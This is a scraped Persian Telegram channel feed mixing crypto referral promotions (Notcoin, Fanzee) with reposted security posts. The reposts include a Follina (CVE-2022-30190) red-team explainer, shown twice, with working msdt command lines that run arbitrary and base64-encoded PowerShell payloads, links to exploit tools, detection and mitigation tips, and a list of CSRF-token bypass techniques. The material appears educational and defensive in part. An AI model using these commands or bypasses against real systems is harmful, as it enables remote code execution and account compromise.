از نگاه احسان
Open in Telegram
از چیزایی میگم که ارزش فکر کردن دارن 💭 Life • Web3 • Ideas • People 🔗 x.com/ehsan_ton
Show more6 901
Subscribers
-1424 hours
-1477 days
-48330 days
Posts Archive
6 897
https://t.me/fanzeebattlesbot?start=referral_126D87E647704BF3
Join the Battles and get an extra 100 FNZ using my referral link
6 897
با این وضعیت آمار دیفیس ها که از سایت zone-h قابل مشاهده هست و همانطور که قابل حدس بود قضیه دیفیس دیگه دموده شده و همین روزا این وبسایتم خدافظی خواهد کرد.
6 897
این برادر Terminatior ایرونی حدود 11 سال پیش اولین وب سایت من رو هک کرد 😂😂 هیچ چیزی از اون دوران ندارم غیر از یه Mirror سایت zone-h!
حتی القاب اون دوران هم یادم رفته. Mirror هایی که Web.archive داره هم خوب کار نمیکنه. همینجوری سریع عمر آدم میگذرد.
6 897
💵 توی قسمت Earn تسک هارو انجام بدید. راحته کاری نداره و وریفیکیشن درست حسابی ام نداره. خیلی راحت 300-400 کی میتونید بگیرید.
6 897
💵 بعد از اینکه وارد لیگ نقره ای بشید، میتونید Auto Bot رو فعال کنید و فقط هر 12 ساعت یه بار برید مقدار ماین شده رو جمع کنید.
6 897
نات کوین ها حداکثر تا 1 آپریل ماین میشن. احتمالا بعد از 1 آپریل یه برنامه جدیدی خواهند داشت و بازی رو شاید اصلا عوض کنن و از این حالت click to earn ای در بیاد و فقط برای ماینینگ Click to Earn زده باشن. هر مقدار نات کوین داشته باشید بعدا با یه مقدار خیلی کمی TON میتونید مینت کنید رو بلاکچین تون.
همینطور تیم نات کوین گفته که ارزشون برخلاف میم کوین های دیگه صفر زیاد نخواهد داشت. همش وابسته به 1 آپریله. با لینک پین شده برید بونوس اولیه میگیرید.
6 897
حداقل قیمت فعلی ۱۰ میلیون نات کوین ۵.۹ TON معادل تقریبا ۳۰ دلار با ۲ میلیون تومان ایران هست. برای اینکه مینت کنید و بتونید تو presale بفروشید باید ۱۰ میلیون جمع کنید
6 897
برید نات کوین بگیرید تا رستگار شوید. ۱۰ میلیون تا ووچر رو میتونید بگیرید ۱ اپریل مینت میشه
6 897
https://t.me/notcoin_bot?start=r_576935_10016678
🎁 +2.5k Notcoin as a first-time gift
🎁🎁🎁 +50k Notcoin if you have Telegram Premium @PremiumBot
6 897
Repost from Security Analysis
⭕️ #هشدار
در کانال ها و گروه های زیادی این پیشنهاد رو به کاربران میدن که برای متصل شدن و دور زدن فیلترینگ، تنظیمات اینترنت خودشون رو در حالت 2G بزارن.
اگر روی این حالت ببرید تمام ارتباطات شما بدون هیچگونه رمزنگاری تبادل میشود.
یعنی با داشتن شماره موبایل شما ، نهادهای جاسوسی میتونند موبایل شما رو هک کنند.
#هشدار
@securation
6 897
Repost from Security Analysis
⭕️ شنود پیامک های شما و سیستم جدید فیلترینگ که باعث میشه پیام ها به دست همدیگه نرسه یک مرض ثابت و رایج شده.
اینجا نرم افزار نهفت خیلی به کار میاد و حتما همگی از این نرم افزار استفاده کنید:)
++«نهفت» نرمافزار آفلاین برای رمزنگاری پیامهای متنی در گوشیهای اندرویدی است.
با نهفت پیامهای خود را در قالب یک عکس یا رشتهای از کلمات معنادار فارسی رمزنگاری کرده و آن را از طریق هر پیام رسانی، برای شخص مورد نظر خود ارسال کنید. نهفت یک پیامرسان نیست، بلکه ابزاری برای رمزنگاری پیامهاست.
دانلود از گوگل پلی
لطفا برای همگی دوستان و آشنایان خود ارسال کنید.
#فیلترینگ #شنود #سانسور
@securation
6 897
Repost from SoheilSec
با سلام و وقت بخیر وبینار Red Team P1 پنجشنبه 3 شهریور ساعت 13 برگزار خواهد شد.
سرفصل های که قرار صحبت بشه و همچنین لینک ورود به وبینار :
https://webinar.sindadsec.ir/redteaming
6 897
Repost from Security Analysis
⭕️ پتروشیمی لرستان و شرکت پتروشیمی فجر هک شده و دیتاهای اونها برای فروش قرار گرفته است.
تصویر ضمیمه شده یکی از عکسهایی هست که شخص هکر برای POC ارائه قرار داده است.
تاکنون هیچ واکنشی از مراجع قانونی یا پتروشیمی های مربوطه ارائه داده نشده است.
#پتروشیمی_فجر #لرستان
@securation
6 897
Repost from Security Analysis
⭕️ بنظر میاد دانشگاه شریف و دانشگاه تهران توسط گروهی با پرچم #اسرائیل هک شده اند.
تصاویری از دسترسی root سرورهای دانشگاه شریف و دانشگاه تهران بهمراه تصاویر دیگری از ایمیل سرورهای آنها نشان میدهد هکرها به تمامی سرویس های این دو دانشگاه نفوذ کامل داشته اند.
@securation
6 897
Repost from Security Analysis
⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات Client access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و...
حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و Excel و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد.
حالا نکته ای که هست
با اجرای این خط کامند:
msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"
ماشین حساب اجرا میشه
و با اجرای :
msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"
اگر جای base64_payload پیلود ما باشه اجرا میشه .
برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :
https://github.com/Hrishikesh7665/Follina_Exploiter_CLI
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
https://github.com/JohnHammond/msdt-follina
از این ابزار ها میتوان به راحتی استفاده کرد.
https://github.com/rayorole/CVE-2022-30190
این هم فایل HTML مورد نظر هستش
بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟
اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست
راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست.
در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم.
نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟
اگر به صورت کامندی صورت گرفته باشه باید
در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم
حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه
به هر طریقی که ما اجرا کنیم
یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه )
در مسیر appdata/local/diagnostics هستش.
#redteam #follina #exploit #analysis
@securation6 897
Repost from Security Analysis
⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات clinet access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و...
حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و EXEL و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد.
حالا نکته ای که هست
با اجرای این خط کامند:
msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"
ماشین حساب اجرا میشه
و با اجرای :
msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"
اگر جای base64_payload پیلود ما باشه اجرا میشه .
برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :
https://github.com/Hrishikesh7665/Follina_Exploiter_CLI
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
https://github.com/JohnHammond/msdt-follina
از این ابزار ها میتوان به راحتی استفاده کرد.
https://github.com/rayorole/CVE-2022-30190
این هم فایل HTML مورد نظر هستش
بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟
اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست
راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست.
در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم.
نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟
اگر به صورت کامندی صورت گرفته باشه باید
در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم
حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه
به هر طریقی که ما اجرا کنیم
یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه )
در مسیر appdata/local/diagnostics هستش.
#redteam #follina #exploit #analysis
@securation6 897
Repost from Security Analysis
⭕️ دور زدن CSRF Tokens
1- حذف کردن CSRF Token
2- تعویض متد درخواست از POST به GET
3- استفاده از CSRF Token کاربر دیگر
4- ترکیب کردن Session Fixation و استفاده از یک توکن جعل شده معتبر در مواقعی که مکانیزم به کار رفته Double submit cookie هست.
https://systemweakness.com/introduction-to-csrf-stepwise-guide-to-bypass-csrf-tokens-2-2-1375b30d479e
#web #cookie #CsrfToken
@securation
